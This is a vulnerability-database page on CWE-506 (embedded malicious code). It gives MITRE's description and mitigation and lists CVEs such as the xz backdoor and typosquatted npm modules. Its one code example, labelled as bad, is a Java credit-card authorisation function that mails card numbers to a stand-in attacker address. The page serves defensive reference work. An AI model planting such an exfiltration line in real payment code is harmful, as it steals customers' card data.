Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-506 (内嵌的恶意代码) — Vulnerability Class 78

78 vulnerabilities classified as CWE-506 (内嵌的恶意代码). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
Mitigations (1)
Implementation, OperationRemove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE IDTitleCVSSSeverityPublished
CVE-2024-3094 Xz: malicious code in distributed source 10.0 Critical2024-03-29
CVE-2023-2003 Embedded malicious code vulnerability in Unitronics Vision1210 — Vision1210 9.1 Critical2023-07-13
CVE-2021-22887 Pulse Secure PSA5000 and PSA7000 安全漏洞 — PSA5000, PSA7000 5.7 -2021-03-16
CVE-2020-15165 Potentially tampered sources on Play Store for Chameleon Mini Live Debugger — ChameleonMiniLiveDebugger 9.3 Critical2020-08-28
CVE-2017-16202 cofeescript模块安全漏洞 — coffeescript node module 7.5 -2018-06-07
CVE-2017-16207 discordi.js 安全漏洞 — discordi.js node module 7.3 -2018-06-07
CVE-2017-16205 coffescript模块安全漏洞 — coffeescript node module 7.5 -2018-06-07
CVE-2017-16204 jquey模块安全漏洞 — jquey node module 7.5 -2018-06-07
CVE-2017-16203 coffe-script模块安全漏洞 — coffeescript node module 7.5 -2018-06-07
CVE-2017-16128 npm-script-demo 安全漏洞 — npm-script-demo node module 9.8 -2018-06-07
CVE-2017-16056 mssql.js 安全漏洞 — mssql.js node module 7.5 -2018-06-07
CVE-2017-16057 nodemssql 安全漏洞 — nodemssql node module 7.5 -2018-06-07
CVE-2017-16058 gruntcli 安全漏洞 — gruntcli node module 7.5 -2018-06-07
CVE-2017-16059 mssql-node 安全漏洞 — mssql-node node module 7.5 -2018-06-07
CVE-2017-16060 babelcli 安全漏洞 — babelcli node module 7.5 -2018-06-07
CVE-2017-16063 node-opensl 安全漏洞 — node-opensl node module 7.5 -2018-06-07
CVE-2017-16064 node-openssl 安全漏洞 — node-openssl node module 7.5 -2018-06-07
CVE-2017-16065 openssl.js 安全漏洞 — openssl.js node module 7.5 -2018-06-07
CVE-2017-16066 opencv.js 安全漏洞 — opencv.js node module 7.5 -2018-06-07
CVE-2017-16067 node-opencv 安全漏洞 — node-opencv node module 7.5 -2018-06-07
CVE-2017-16068 ffmepg 安全漏洞 — ffmepg node module 7.5 -2018-06-07
CVE-2017-16069 nodeffmpeg 安全漏洞 — nodeffmpeg node module 7.5 -2018-06-07
CVE-2017-16071 nodemailer.js 安全漏洞 — nodemailer-js node module 7.5 -2018-06-07
CVE-2017-16081 cross-env.js 安全漏洞 — cross-env.js node module 7.5 -2018-06-07
CVE-2017-16080 nodesass 安全漏洞 — nodesass node module 7.5 -2018-06-07
CVE-2017-16079 smb 安全漏洞 — smb node module 7.5 -2018-06-07
CVE-2017-16078 shadowsock 安全漏洞 — shadowsock node module 7.5 -2018-06-07
CVE-2017-16077 mongose 安全漏洞 — mongose node module 7.5 -2018-06-07
CVE-2017-16075 http-proxy.js 安全漏洞 — http-proxy.js node module 7.5 -2018-06-07
CVE-2017-16076 proxy.js 安全漏洞 — proxy.js node module 7.5 -2018-06-07

Vulnerabilities classified as CWE-506 (内嵌的恶意代码) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.